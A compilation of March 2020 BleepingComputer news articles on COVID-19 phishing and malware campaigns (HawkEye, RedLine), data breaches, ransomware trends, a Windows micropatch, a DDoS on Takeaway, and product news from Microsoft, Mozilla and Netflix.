To avoid getting scammed by fraudsters, infected with malware, or have your personal information stolen, IC3 recommends not clicking on links or open attachments sent by people you don't know and to always make sure that the websites you visit are legitimate by typing their address in the browser instead of clicking hyperlinks.

You should also never provide sensitive information like user credentials, social security numbers, or financial data when asked over email or as part of a robocall.

To make it easier to spot phishing and scam attempts, you can also check the domain of websites you visit for misspellings or for the wrong top-level domain (TLD) at the end of the site's URL — .com or .net instead of .gov, the sponsored top-level domain (sTLD) used by US government sites.

Microsoft today also shared a list of measures to protect against coronavirus-themed phishing attacks including keeping software up to date, using an anti-malware solution and an email service with phishing protection, as well as enable multi-factor authentication (MFA) on all accounts.

U.S. attorneys and federal prosecutors fight COVID-19 fraud
The FBI was joined this week by the Federal Trade Commission (FTC) and attorney generals and federal prosecutors (1, 2, 3, 4, 5, 6) across the US to investigate and fight against coronavirus-themed phishing and scams.

Warnings of increased malicious activity attempting to capitalize on the COVID-19 outbreak to infect their devices with malware, steal their sensitive info, and scam them.

"In a time of high stress and fear it is critical that for the public to know that law enforcement at all levels remains dedicated to protecting them from harm – whether it is from scams, frauds or violent crime," U.S. Attorney Brian T. Moran said.

"As Attorney General Barr has directed, we will remain vigilant in detecting, investigating and prosecuting wrongdoing related to the crisis. To those who are engaged in perpetrating these schemes, you are on notice that my office will aggressively pursue you and hold you to answer for preying on our communities."

"The pandemic is dangerous enough without wrongdoers seeking to profit from public panic and this sort of conduct cannot be tolerated," Attorney General William Barr added in a communication to the U.S. attorneys.

U.S. Attorneys all over the states have also announced the appointment of federal prosecutors to coordinate and lead investigations and prosecutions of fraudsters trying to take advantage of people during the COVID-19 pandemic.

The European Commission, CERT-EU, ENISA, and Europol have also issued a statement today (1, 2, 3) about a joint mission to track and defend remote workers from coronavirus-themed malicious activities.

Coronavirus cure scams can be reported to the Federal Trade Commission (FTC) at https://www.ftccomplaintassistant.gov and any other suspicious activity, fraud, or attempted fraud to the FBI’s Internet Crime Complaint Center at https://www.ic3.gov.


Firefox Reenables Insecure TLS to Improve Access to COVID19 Info
22
.3.2020  Bleepingcomputer  Safety

Mozilla says that the support for the insecure TLS 1.0 and TLS 1.1 will be reenabled in the latest version of Firefox to maintain access to government sites with COVID19 information that haven't yet upgraded to TLS 1.2 or TLS 1.3.

"We reverted the change for an undetermined amount of time to better enable access to critical government sites sharing COVID19 information," Mozilla said today in an update to the Firefox 74.0 release notes.

Plans to remove TLS
TLS 1.0 and TLS 1.1 support was dropped with the release of Firefox 74.0 on March 10 to improve the security of website connections, with sites that don't support TLS 1.2 or TLS 1.3 to show a "Secure connection failed" error page instead of their contents and an override 'Enable TLS 1.0 and 1.1' button for that web site connection.

In October 2018, all major browser makers including Microsoft, Google, Apple, and Mozilla announced the retirement of the TLS 1.0 and TLS 1.1 protocols released over a decade ago.

With more than 97% of the sites surveyed by Qualys SSL Labs supporting TLS 1.2 and TLS 1.3, the decision to retire the two protocols in favor of newer and better supported TLS 1.3 and TLS 1.3 is logical as they can provide a more secure path moving forward.

97% of surveyed sites support TLS 1.2 and 1.3
97% of surveyed sites support TLS 1.2 and 1.3 (Qualys SSL Labs)
According to TLS 1.0 and TLS 1.1 usage statistics at the time, the vast majority of users are no longer even using these protocols:

Google reported that only 0.5% of HTTPS connections made by Chrome are using TLS 1.0 or TLS 1.1
Apple reported that on their platforms less than 0.36% of HTTPS connections made by Safari are using TLS 1.0 or TLS 1.1.
Microsoft said that only 0.72% of secure connections made by Edge use TLS 1.0 or 1.1.
Firefox had the largest amount of connections, with 1.2% of all connections using TLS 1.0 or 1.1.
Hundreds of thousands of sites still rely on TLS 1.0 and TLS 1.1
Despite this, as Netcraft reported at the beginning of March 2020, over 850,000 websites are still using the outdated and insecure TLS 1.0 and TLS 1.1 protocols that expose users to a wide range of cryptographic attacks (1, 2) leading to their web traffic being decrypted by attackers.

"The use of TLS 1.0 on e-commerce websites as a measure for protecting user data has been forbidden by the Payment Card Industry Data Security Standard since June 2018, and many websites have already migrated," as Netcraft said.

However, seeing that Mozilla decided to bring back support for the two previously retired TLS protocols, there are enough government sites sharing information on the current coronavirus pandemic to a reversal of the removal decision.


Microsoft Shares Sneak Peek of Upcoming Windows 10 Features
22
.3.2020  Bleepingcomputer  OS

Microsoft's Chief Product Officer for Windows & Devices Panos Panay has posted a Windows 10 video that offers us a sneak peek at some of the new and upcoming features coming to Windows 10.

In an Instagram video posted yesterday, Panos offers a glimpse of some of these features including a look at the new Fluent system icons, an updated File Explorer, a new context menu, and a redesigned Start Menu.

While the video does not offer us high-quality glimpses of the upcoming features, it does let us get a general idea of what they will be offering.

It is not known when these new features will be coming, but Windows 10 Insiders will probably get a crack at them sooner than everyone else.

New Fluent Icons
Microsoft has already started rolling out its new Fluent-based system icons for Windows 10 that add more color and depth to the icons associated with popular programs.

New Fluent Icons
New Fluent Icons
New context menus add shortcuts
A new context menu was shown that offers shortcuts to the previous screen, the Address Bar, to Tabs, and the ability to add a New Tab. Does this mean the Windows 10 Sets feature may make an appearance?

New 'Go Back' Context Menu
New 'Go Back' Context Menu
New Windows 10 File Explorer
We also saw an updated File Explorer showing more elegant icons and a new redesigned interface. This new interface appears to do away with the address bar, but I am hopeful we will be able to display it if we choose.

We also see OneDrive integration, removable media accessible outside of 'This PC', and of particular interest, Google Drive integration.

New Windows 10 File Explorer
New Windows 10 File Explorer
New Windows 10 Start Menu
Microsoft also gave us another glimpse of their upcoming Windows 10 Start Menu that utilizes the new Fluent icons and transparent background to make the icons stand out more.

New Windows 10 Start Menu
New Windows 10 Start Menu


Rogers Data Breach Exposed Customer Info in Unsecured Database
22
.3.2020  Bleepingcomputer  Incindent

Canadian ISP Rogers Communications has begun to notify customers of a data breach that exposed their personal information due to an unsecured database.

In a data breach notification posted to their site, Rogers states that they learned on February 26th, 2020 that a vendor database containing customer information was unsecured and publicly exposed to the Internet.

"On February 26, 2020, Rogers became aware that one of our external service providers had inadvertently made information available online that provided access to a database managed by that service provider. We immediately made sure the information was removed and began an investigation to see how many customers might have been impacted. No credit card, no banking, or no password information was exposed. We are directly contacting any customer whose information was in the database. We sincerely apologize for this incident and regret any inconvenience this may cause," Rogers explained.

The following customer information was exposed by this data breach:

address
account number
email address
telephone number
Rogers' support article states that no credit card, banking, or password information was exposed by the database.

For affected customers, Rogers is providing a complimentary Transunion credit monitoring subscription.

As some of the exposed information was mobile numbers, Rogers has also added port protection to the numbers to block them from being ported to another carrier without authorization.

"Some wireless account numbers were included in the vendor database. If a customer’s wireless account number was included, we added a block to their account (called port protection) to prevent their phone number from being transferred to another carrier without their authorization. Customers can call us if they wish to remove this block."

All customers impacted by this data breach should be on the lookout for targeted phishing scams. These phishing scams could pretend to be from Rogers or use the accessed information to gain your information at other companies.


WHO Chief Impersonated in Phishing to Deliver HawkEye Malware
22
.3.2020  Bleepingcomputer  Phishing  Virus

An ongoing phishing campaign delivering emails posing as official messages from the Director-General of the World Health Organization (WHO) is actively spreading HawkEye malware payloads onto the devices of unsuspecting victims.

This spam campaign started today according to researchers at IBM X-Force Threat Intelligence who spotted it and it has already delivered several waves of spam emails attempting to pass as being delivered by WHO.

"HawkEye is designed to steal information from infected devices, but it can also be used as a loader, leveraging its botnets to fetch other malware into the device as a service for third-party cybercrime actors," IBM X-Force's research team previously said.

Malspam promising coronavirus prevention and cure instructions
The emails come with archive attachments containing a Coronavirus Disease (Covid-19) CURE.exe executable described by the attackers as a "file with the instructions on common drugs to take for prevention and fast cure to this deadly virus called Coronavirus Disease (COVID-19)."

"This is an instruction from WHO (World Health Organization) to help figth against coronavirus," the phishing emails also add.

The targets are also asked to review the attached file and follow the enclosed instructions, as well as forward it to family and friends to share the "instructions" needed to fight the virus.

Phishing email sample
Phishing email sample (IBM X-Force)
"These emails claiming to be from the World Health Organization are being delivered personalized by addressing the recipient by a username stripped out of the email address," IBM X-Force researchers found.

However, instead of coronavirus drug advice, the executable actually is a HawkEye keylogger loader with anti-VM and anti-sandbox capabilities that will attempt to turn off Windows Defender via registry and to disable scans and updates using PowerShell.

Attempting to turn off Windows Defender
Attempting to turn off Windows Defender (IBM X-Force)
Collects and exfiltrates credentials and keystrokes
The final HawkEye payload, an executable named GqPOcUdjXrGtqjINREXuj.exe, is loaded from the resource section of a Bitmap image and injected using Process Hollowing.

The HawkEye sample analyzed by IBM X-Force is capable of capturing keystrokes on infected devices, but it can also capture screenshots and steal user credentials from a wide range of applications and from the system clipboard.

The malware will harvest credentials from web browsers and email clients such as Firefox, Thunderbird, Postbox, SeaMonkey, WaterFox, PaleMoon, and more. All the data it collects is encrypted and sent to its operators by email via the SMTP protocol.

"The sample can download other malware from http://ypsmKO[.]com, the downloaded malware will be saved at %temp%\Svf," the researchers add.

"The malware's configuration data and other important settings such as the SMTP server, email address, and password used are AES encrypted and stored in an array."

In December 2019, HawkEye ranked seventh in the top 10 of the most prevalent threats in 2019 based on the number of samples uploaded to the interactive malware analysis platform Any.Run.

ANY.RUN
@anyrun_app
📊 Annual TOP10 threats by uploads to ANYRUN!

1⃣ #Emotet 36026 🔥
2⃣ #AgentTesla 10324
3⃣ #NanoCore 6527
4⃣ #LokiBot 5693
5⃣ #Ursnif 4185
6⃣ #FormBook 3548
7⃣ #HawkEye 3388
8⃣ #AZORult 2898
9⃣ #TrickBot 2510
🔟 #njRAT 2355https://any.run/malware-reports/ …

102
8:03 AM - Dec 23, 2019
Twitter Ads info and privacy
69 people are talking about this
Previous HawkEye campaigns
The HawkEye information-stealing malware (also known as Predator Pain) has been used by threat actors to infect victims and sold on dark web markets and hacking forums since at least 2013.

HawkEye's developers regularly update the malware with fixes and new capabilities and advertise it as a system monitoring solution with data exfiltration features.

Attackers have previously targeted businesses on a worldwide scale with the HawkEye malware in two malspam campaigns running from April and May 2019.

They used Estonian spam servers to deliver malicious spam emails disguised as messages from Spanish banks or legitimate companies and distributing both HawkEye Reborn v8.0 and HawkEye Reborn v9.0.

"Recent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward," said Cisco Talos about the HawkEye Reborn v9 malware.

"HawkEye has been active across the threat landscape for a long time and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts."


Sodinokibi Ransomware Data Leaks Now Sold on Hacker Forums
22
.3.2020  Bleepingcomputer  Ransomware

Ransomware victims who do not pay a ransom and have their stolen files leaked are now facing a bigger nightmare as other hackers and criminals sell and distribute the released files on hacker forums.

In 2019, the Maze Ransomware operators began stealing data from victims before encrypting devices and using the stolen files as leverage to get the victims to pay. If the victim decided not to pay, the Maze operators would then publish the files,

Since then, other ransomware operators such as Sodinokibi, DoppelPaymer, and Nemty have begun the same practice of using stolen files as leverage.

Recently, the Sodinokibi Ransomware operators published over 12 GB of stolen data allegedly belonging to a company named Brooks International for not paying the ransom.

 Sodinokibi Ransomware leaking data
Sodinokibi Ransomware leaking data
While making the data publicly accessible is bad enough, BleepingComputer has been told by cyber-intelligence firm Cyble that other hackers and criminals have started to distribute and sell this data on hacker forums.

For example, the following image is a hacker forum post where a member is selling a link to the stolen data for 8 credits, which is worth approximately 2 Euros.

Hacker forum post selling the data
Hacker forum post selling the data
From screenshots of the files shared with BleepingComputer, this stolen data is very valuable to hackers as it contains user names and passwords, credit card statements, alleged tax information, and much more.

Based on the comments from hackers who purchased the link to this data, they are also finding the data valuable.

"It even has credit card number & a password. lol !!"

"To bad these W2 forms weren't Donald Trump's taxes. lol !!"

"Thank you for being the hero we may not deserve, but need."

BleepingComputer reached out to Brooks International by phone to warn them about the distribution of their data and ask related questions, but after speaking to someone never received a phone call back.

Ransomware attacks are data breaches
For a long time, BleepingComputer has been stating that Ransomware attacks are data breaches as it has been a widely known secret that attackers sifted through their victim's files before encrypting them.

Now that they are also stealing and publishing these files for non-payment, there is no longer any doubt that these attacks need to be classified as data breaches.

To make matters worse, it is not only corporate data being exposed, but also employee's personal information being stolen. These employees need to be informed of these breaches so that they can protect themselves from identity theft.

Unfortunately, too many ransomware attacks go undisclosed, even to the employees who are impacted.


Netflix Reduces Video Quality in Europe by 25% to Lower Load
22
.3.2020  Bleepingcomputer  IT

Netflix is reducing the quality of its streamed shows and movies in Europe for the next 30 days to reduce congestion on Internet infrastructure.

With European countries on national lockdowns, mandated curfews, and people performing social-isolation during the pandemic, the EU commission has been concerned that the increased video streaming would overburden Internet infrastructure.

Today, Internal Market Commissioner Thierry Breton called on streaming providers to reduce the quality of the video streams to standard definition (SD) rather than high definition (HD) to reduce the bandwidth required for streaming a show.

"As a result of social distancing measures put in place across Europe to fight the Coronavirus pandemic, the demand for Internet capacity has increased, be it for teleworking, e-learning or entertainment purposes. This could put networks under strain at a moment when they need to be operational at the best possible level. In order to prevent congestion and to ensure the open Internet, Internal Market Commissioner Thierry Breton has called on the responsibility of streaming services, operators and users. Streaming platforms are advised to offer standard rather than high definition and to cooperate with telecom operators."

After a conversation with Commissioner Thierry Breton and Reed Hastings, Netflix has agreed to reduce the bit rate on all streams in Europe by 25% for the next 30 days.

"Following the discussions between Commissioner Thierry Breton and Reed Hastings - and given the extraordinary challenges raised by the coronavirus - Netflix has decided to begin reducing bit rates across all our streams in Europe for 30 days. We estimate that this will reduce Netflix traffic on European networks by around 25 percent while also ensuring a good quality service for our members", Netflix told BleepingComputer.

BleepingComputer has also contacted other streaming providers such as Hulu and Amazon to see if they would reduce their bit rate but have not heard back at this time.


Microsoft Delays Windows 10 1709 End of Service Due to Pandemic
22
.3.2020  Bleepingcomputer  OS

Microsoft is pushing back the scheduled end of service date of Windows 10, version 1709 to October 13, 2020, for the Enterprise, Education, and IoT Enterprise editions.

Windows 10 Version 1709 (also known as Fall Creators Update) should have reached end of service on April 14, 2020, according to the Windows lifecycle fact sheet.

"This means devices will receive monthly security updates only from May to October," Microsoft says. "The final security update for these editions of Windows 10, version 1709 will be released on October 13, 2020 instead of April 14, 2020."

Windows 10 1709 EoS delayed
"Microsoft has been evaluating the public health situation and its impact on our customers," the company explains.

"To ease one of the many burdens our customers are facing, Microsoft will delay the scheduled end of service date for the Enterprise, Education, and IoT Enterprise editions of Windows 10, version 1709."

Until it reaches the new end of service date, Windows 10, version 1709 security updates will be delivered to customers through the usual channels, including Windows Update, Windows Server Update Services, and the Microsoft Update Catalog.

This means that Windows 10 customers will not have to tweak their update management configurations since all supported versions of Microsoft Configuration Manager will support Windows 10, version 1709 update delivery until October 13, 2020.

If they have not already, IT teams are encouraged to shift to Windows Update for Business, allowing users to take both feature updates and quality updates directly from Microsoft in a secure and often faster manner. See Windows as a Service (WaaS) to learn how to keep Windows 10 devices up to date. - Microsoft

More Microsoft products reaching end of life in 2020
Several other major Microsoft products will also reach their end of support in 2020, with Office 2010, Visual Studio 2010, Windows 7, Windows Server 2008 (including 2008 R2), and multiple Windows 10 versions including 1709, 1803 and 1903 being the highlights.

Microsoft stops releasing bug fixes for newly discovered issues, security fixes for newly found vulnerabilities, as well as technical support for products that have already reached their end of support.

Customers who still use end of service software are urged by Redmond to upgrade as soon as possible to the latest on-premise or cloud versions to keep their devices bug-free and safe from attacks.

Microsoft provides a list of all products that will be retired or will reaching the end of support in 2020 and a list of all products and their lifecycle policy timelines within the Lifecycle Product Database.

A full list of end of support deadlines and related migration info for Microsoft products is available on the Search product lifecycle page.

Windows Update

@WindowsUpdate
We are delaying the scheduled end of service date for the Enterprise, Education, and IoT Enterprise editions of Windows 10, version 1709 to October 13, 2020. More information here: https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#403 ….

73
11:59 PM - Mar 19, 2020
Twitter Ads info and privacy
53 people are talking about this
Google also halted new Chrome and Chrome OS releases
Google also announced yesterday that future Chrome and Chrome OS major version releases are also temporarily paused due to adjusted work schedules caused as employees are having to work from home because of the novel coronavirus pandemic.

"Due to adjusted work schedules at this time, we are pausing upcoming Chrome and Chrome OS releases," the company said.

"Our primary objectives are to ensure they continue to be stable, secure, and work reliably for anyone who depends on them."

However, the Chrome development team will continue to work remotely throughout the COVID-19 outbreak, prioritizing security updates that will still be released as Chrome v80 minor updates.

As proof, Google Chrome 80.0.3987.149 was released after the delayed release of Chrome v81 was announced, featuring security fixes patching 13 high severity vulnerabilities.


Netflix Party Lets You Watch Shows With Friends to Fight Isolation
22
.3.2020  Bleepingcomputer  Security

Feeling lonely during the period of social isolation or self-quarantine? A Chrome browser extension lets you binge-watch your favorite Netflix shows with friends and family while text chatting with them.

With social interaction at a minimum during the COVID-19 outbreak, people rightfully feel cooped up and lonely due to not being able to do anything with their friends.

A free Chrome browser extension called Netflix Party may help bring a little social interaction back into your life.

Netflix Party lets you watch shows together
Netflix Party allows friends and family to watch the same show together while providing a text chat room experience.

To use this browser extension, each user must be logged into Netflix and have the Netflix Party extension installed.

A user can then start a Netflix video, pause it, and click on the NP button in the Chrome Omnibar to create a group link that can be shared with others.

When creating this group, I suggest you make it so only the group creator can control the video playback so that other people do not pause the video whenever they want.

Create a Netflix Party
Create a Netflix Party
When another user with Netflix Party clicks on the shared link, they will automatically be brought to the selected video and a chat room will be shown on the right side of the screen.

This chat room lets you set your name, use one of a few available avatars, and chat with each other while you are watching the show or movie.

Netflix Party
Netflix Party
The group creator can then start the show and pause it as needed and the show will start and pause on the other party member's computers.

In BleepingComputer's tests, the process works very well, but there will be a slight delay between the person controlling the video and others who are part of the party. In our tests, this only caused about a one to two-second delay.

It should also be noted, that this extension does track your activity and what Netflix shows you watch but will tie this data to your anonymous Netflix Party ID.

If this does not bother you, then Netflix Party may be a great way to watch a show or movie with some friends to ease your social isolation.


Microsoft Teams Reaches 44M Daily Users After 12M Weekly Gain
22
.3.2020  Bleepingcomputer  IT

Microsoft announced today that its Teams collaboration service experienced a huge usage spike with 12 million new daily active users being added within the last seven days, bringing the total to 44 million.

The newly added Microsoft Teams users are already behind more than 900 million call and meeting minutes each day during the last week.

"It’s very clear that enabling remote work is more important than ever, and that it will continue to have lasting value beyond the COVID-19 outbreak," Corporate Vice President for Microsoft 365 Jared Spataro said.

"We are committed to building the tools that help organizations, teams, and individuals stay productive and connected even when they need to work apart."

Microsoft Teams which is part of Microsoft's Office 365 enterprise subscription services was launched in November 2016 as a direct competitor to Slack's instant messaging platform.

Slack reported in October 2019 that it has reached over 12 million daily active users, lagging behind the 13 million users reported by Microsoft earlier, in July 2019 — Teams reached 20 million daily active users in November 2019.

Microsoft

@Microsoft
Microsoft Teams' 44 million users have generated more than 900 million meeting minutes every day this week. As organizations adapt to remote work, we're helping users stay connected. https://msft.it/6005TdOZc

1,147
5:14 PM - Mar 19, 2020
Twitter Ads info and privacy
450 people are talking about this
Tens of thousands of users from hundreds of orgs
20 Microsoft Teams customers including Ernst & Young, SAP, Pfizer, and Continental AG currently have over 100,000 employees using the service on a daily basis, while Accenture has also added has 440,000 additional Teams users.

At the moment, employees from 93 Fortune 100 companies are using Microsoft's Teams service, while more than 650,000 other organizations have more than 10,000 Teams users in their ranks.

Microsoft says that only intentional actions like replying to messages, joining meetings, or opening files made by users on their desktop, mobile, or web Teams clients are taken into consideration when counting the number of active users.

Interactions such as minimizing the Microsoft Teams client or closing the application do not automatically tag the user as being active.

Teams stats
Image: Microsoft
New features rolling out
Microsoft also announced that new features are rolling out to Microsoft Teams users including automatic real-time noise suppression to reduce background noise during meetings.

Microsoft Teams users will also get support for offline and low-bandwidth usage making it possible to read messages even when using it without an Internet connection and in low-bandwidth network environments.

"Teams users will now be able to open Teams even when no network is available," Microsoft says. "You will be able to create and read messages, browse previously viewed channels, and to view calendar summaries."

"If conditions are too poor to send a message, Teams will notify users of this and then save the message until the user has returned to a functioning network. This functionality is coming to Teams in the next few weeks."

Raise hands feature
Raise hands feature (Microsoft)
Users will also be able to draw attention while in Teams meetings using a new "raising hands" feature that makes it easy to actively take part in large meetings.

"Everyone will see a visual cue on the attendee’s video feed, as well as in the participant list, and can be sure to give them the room to participate in the conversation at hand," Microsoft adds.

The number of members in individual teams will also be raised from 5,000 to 10,000 users during the incoming updates in the next few weeks, just as the number of people being able to join a group chat which can now accommodate up to 250 users.

Microsoft Teams goes free, outage issues
Microsoft also announced earlier this month that Microsoft Teams will be free during the next six months to help orgs' to move towards a remote workplace during the COVID-19 pandemic.

"At Microsoft, the health and safety of employees, customers, partners and communities is our top priority," Microsoft EVP and President JP Courtois said. "By making Teams available to all for free for six months, we hope that we can support public health and safety by making remote work even easier."

At the start of this week, Microsoft Team also experienced an outage caused by the huge influx of new users, affecting both EU and US users on March 16 and March 17, with reports mentioning messages not being sent, the admin portal being unreliable, and team member management not working properly.

Microsoft 365 Status
@MSFT365Status
We're investigating messaging-related functionality problems within Microsoft Teams. Please refer to TM206544 in your admin center for further details. ^JP

253
9:50 AM - Mar 16, 2020
Twitter Ads info and privacy
291 people are talking about this
Microsoft resolved the on March 17 and determined that it was a caching issue within one of Microsoft Teams infrastructure's components.

The company is also currently working on scaling down select non-essential Office 365 capabilities in response to increased demand and the increasing number of new Microsoft 365 customers.

"Microsoft is actively monitoring performance and usage trends to ensure we're optimizing service for our customers worldwide, and accommodating new growth and demand," a Microsoft spokesperson told BleepingComputer.

"At the same time, these are unprecedented times and we’re also looking at what steps we can take to proactively prepare for these high-usage periods."


RedLine Info-Stealing Malware Spread by Folding@home Phishing
22
.3.2020  Bleepingcomputer  Phishing  Virus

A new phishing email is trying to take advantage of the Coronavirus pandemic and the race to develop medications by promoting a fake Folding@home app that installs an information-stealing malware.

Folding@home is a well-known distributed computing project that allows users to download software that uses CPU and GPU cycles to research new drug opportunities against diseases and a greater understanding of various diseases.

As the COVID-19 epidemic spreads throughout the world, Folding@home has added over 20 new projects focusing on coronavirus research and has seen a huge increase in usage by people all over the world.

Scammers take advantage of a good thing
With the rise in popularity of Folding@home, security researchers at ProofPoint have discovered a new phishing campaign that pretends to be from a company developing a cure for Coronavirus.

These emails have a subject of "Please help us with Fighting corona-virus" and state that they want you to help "speed up our process of finding the cure" by downloading and installing the Folding@home client.

Folding@home Phishing email
Folding@home Phishing email
Click to see full size
The text of this email reads:

Greetings from Mobility Research Inc and Folding@Thome
As we all know, recently corona-virus is becoming a major threat to the human society. We are a leading institution working on the cure to solve this world-wide crisis. However, we need your help. With your contribution, you can speed up our process of finding the cure. The process is very simple, you will need to install an app on your computer, which will allow us to use it to run simulations of the cure.
Embedded in the phishing email is a "Download now" button that when clicked will download a file called foldingathomeapp.exe, which is the Redline information-stealing Trojan.

"RedLine Stealer is new malware available for sale on Russian underground forums with several pricing options: $150 lite version; $200 pro version; $100 / month subscription option. It steals information from browsers such as login, autocomplete, passwords, and credit cards. It also collects information about the user and their system such as the username, their location, hardware configuration, and installed security software. A recent update to RedLine Stealer also added the ability to steal cryptocurrency cold wallets," ProofPoint states in their report.

Once installed, the malware will connect to a remote site to receive commands as to what types of data should be stolen from the victim. These instructions are sent using the SOAP messaging protocol as seen by the image below.

RedLine getting instructions
RedLine getting instructions
This malware can steal saved login credentials, credit cards, cookies, and autocomplete fields from browsers. It can also collect data from FTP and IM clients, steal files, download files, execute commands, and send information back about the computer.

You can see an example of this malware in action in an Any.run session performed by security researcher James.

As this malware can steal a large amount of information, anyone who has fallen victim to this scam should immediately perform a scan using antivirus software.

They should also change the passwords at any online accounts that they frequent as they may now be in the possession of the attackers. This should be done from another computer until they are sure their infected computer has been cleaned.

It should also be noted that Folding@home is a terrific project and just because people are performing scams in their name, does not mean it should be avoided.

Just be sure to download the Folding@home client only from the legitimate site.


Critical RCE Bug in Windows 7 and Server 2008 Gets Micropatch
22
.3.2020  Bleepingcomputer  OS

A micropatch fixing a remote code execution (RCE) vulnerability in the Windows Graphics Device Interface (GDI+) is now available through the 0patch platform for Windows 7 and Server 2008 R2 users.

The patch is available for 0Patch users with PRO accounts with fully updated Windows 7 or Server 2008 R2 devices who haven't yet enrolled in Microsoft's Extended Security Updates (ESU) service (1, 2).

At the moment, only organizations with volume-licensing agreements or small-and-midsize businesses can get an ESU license until January 2023.

"All others have an official update available from Microsoft," as 0patch co-founder Mitja Kolsek told BleepingComputer. "If it turns out that many users on supported versions can't apply the official March update (e.g., functional problems), we'll port it for them too."

The Windows Graphics Device Interface RCE bug
Microsoft released security fixes for the vulnerability tracked as CVE-2020-0881 on March 10, during this month's Patch Tuesday, with all ESU enrolled organizations receiving them on all vulnerable Windows 7 or Server 2008 R2 systems.

The vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory and it could enable attackers who successfully exploit it to take control of unpatched systems.

"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft's security advisory explains.

"Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."

Attackers can use both web-based and file-sharing attack scenarios to exploit CVE-2020-0881 via maliciously crafted websites or documents designed to exploit the memory corruption bug.

CVE-2020-0881 micropatch
CVE-2020-0881 micropatch (0Patch)
CVE-2020-0881 micropatch for Windows 7 and Server 2008 R2
Micropatches are code sent through the 0Patch platform to Windows agents to patch security problems in real-time and applied to running processes without the need for a system restart.

This micropatch is available to paying customers and it fixes the memory corruption issue in Windows GDI+ by adding a similar code block to the one Microsoft used in their security fix.

"Without this, a carefully crafted exploit could lead to deletion of a chosen data structure and subsequently to use-after-free," 0Patch tweeted.

On systems where it is applied, it "implements a logically identical check, but also records an exploitation attempt event before redirecting execution flow to the safe path. (32-bit patch has 4 instructions, 64-bit patch has 5.)"

A video of the micropatch in action is embedded below:

 


Food Delivery Service in Germany Under DDoS Attack
22
.3.2020  Bleepingcomputer  Attack

Cybercriminals found in the context of a public health crisis that caused unprecedented restrictions affecting the restaurant industry a perfect opportunity to launch an attack on the systems of Takeaway food delivery service in Germany.

The measures adopted by the country to limit the spread of the COVID-19 virus have a drastic impact on social life. Restaurants function under strict rules that limit the number of guests, impose a greater distance between the tables, and have to stay closed between 6pm and 6am.

Under these conditions, many Germans order in through food delivery services like Takeaway.com (Lieferando.de). Yet cybercriminals have launched a distributed denial-of-service attack on the website demanding 2 bitcoins (around $11,000) to stop the siege.

Jitse Groen, the founder and CEO of Takeaway, today posted on Twitter the news of the attack. He attached a screenshot with the attacker's demand that threatened to attack other company sites.


Soon after Groen's tweet, the German branch of the company announced that its systems had been attacked and entered in maintenance mode "to ensure the security of all data." This could cause delays in order processing.

Some customers complained that the service accepted new orders, despite its systems being crippled by the attack, and they are not being processed.

In a subsequent tweet, the website informed that it would refund orders that had been paid online and were not delivered. This would not happen automatically, though, and customers would have to contact them via email.

source: Lieferando
Lieferando boasts food delivery from more than 15,000 restaurants in Germany, so the impact of a DDoS attack is significant; not just for customers but for restaurant owners, too.

Times of crisis are typically when cybercriminals strike. As people in countries trying to slow COVID-19 infections are following social distancing recommendations, delivery services are experiencing an overload.

As this situation continues, heinous acts like this are likely to happen, especially from less-skilled attackers. More experienced actors may find a moral compass and take a break for the duration of the pandemic caused by the new coronavirus.

At least two ransomware actors stated that they would stop targeting health and medical organizations. Hospitals already have enough to deal with and any downtime they experience can cost human lives.

At the time of publishing, Lieferando website was up and running.

Update March 19, 08:39 EDT: In a reply to BleepingComputer, Takeaway said that the attack stopped and the company is now dealing with the effects.


Most Ransomware Gets Executed Three Days After Initial Breach
22
.3.2020  Bleepingcomputer  Ransomware

Ransomware gets deployed three days after an organization's network gets infiltrated in the vast majority of attacks, with post-compromise deployment taking as long as 299 days in some of the dozens of attacks researchers at cybersecurity firm FireEye examined between 2017 and 2019.

In 75% of all ransomware incidents, as they found, the attackers will delay encrypting their victims' systems and will use that time to steal Domain Admin credentials that they can later use to distribute the ransomware payloads throughout the compromised environment.

More recently, ransomware operators have also started to harvest and exfiltrate their victims' data, later using it as leverage to make them pay the ransoms under the threat of leaking the stolen information.

While in most of the analyzed incidents the researchers observed post-compromise malicious activity was extensive and could take weeks, the ransomware operators behind GandCrab and GlobeImposter were a lot faster executing the payloads immediately after the initial infiltration event.

Enough time for defense in 75% of incidents
Since ransomware operators deploy their payloads after at least three days during 75% of all ransomware incidents FireEye investigated, organizations would have enough time to defend themselves if using appropriate mitigations.

"This pattern suggests that for many organizations, if initial infections are detected, contained, and remediated quickly, the significant damage and cost associated with a ransomware infection could be avoided," the report says.

"In fact, in a handful of cases, Mandiant incident responders and FireEye Managed Defense contained and remediated malicious activity, likely preventing ransomware deployment."

During some of the successfully thwarted attacks, subsequent investigations resulted in the discovery of ransomware payloads already having been dropped but not executed on some of a victim's systems.

Ransomware deployment

To infiltrate their victims' networks, ransomware gangs have several favorite methods using RDP (LockerGoga), phishing emails with malicious links or attachments (Ryuk), and drive-by malware downloads (Bitpaymer and DoppelPaymer) as initial infection vectors.

"RDP was more frequently observed in 2017 and declined in 2018 and 2019," the report reads. "These vectors demonstrate that ransomware can enter victim environments by a variety of means, not all of which require user interaction."

After hours deployment during most attacks
As the FireEye research team also found, the ransomware was used to encrypt the victims' systems after work hours in roughly 76% of all examined attacks, "on a weekend or before 8:00 a.m. or after 6:00 p.m. on a weekday" according to the target's work week calendar.

This tactic allows the attackers to avoid having their actions noticed by the targeted organization's security team until it is too late and to make sure that the incident responders will not be able to take all the measures needed to stop the attack as during their work hours.

"In other cases, attackers linked ransomware deployment to user actions," FireEye found. "For example, in 2019 incidents at retail and professional services firms, attackers created an Active Directory Group Policy Object to trigger ransomware execution based on user log on and log off."

After hours deployment

To successfully defend against ransomware attacks, FireEye recommends addressing the infection vectors by enforcing multi-factor authentication, performing regular security audits, and using security solutions and email systems capable of detecting malware strains such as Trickbot, Emotet, and Dridex known for dropping ransomware payloads in multi-stage attacks.

Implementing security best practices like regular anti-phishing training, network segmentation, regular backups, restrict Local Administrators and use unique passwords for each of them, as well as ransomware infection cyber insurance could also help mitigate the effects of a ransomware infection.

"The good news is that particularly with post-compromise infections, there is often a window of time between the first malicious action and ransomware deployment," FireEye concluded.

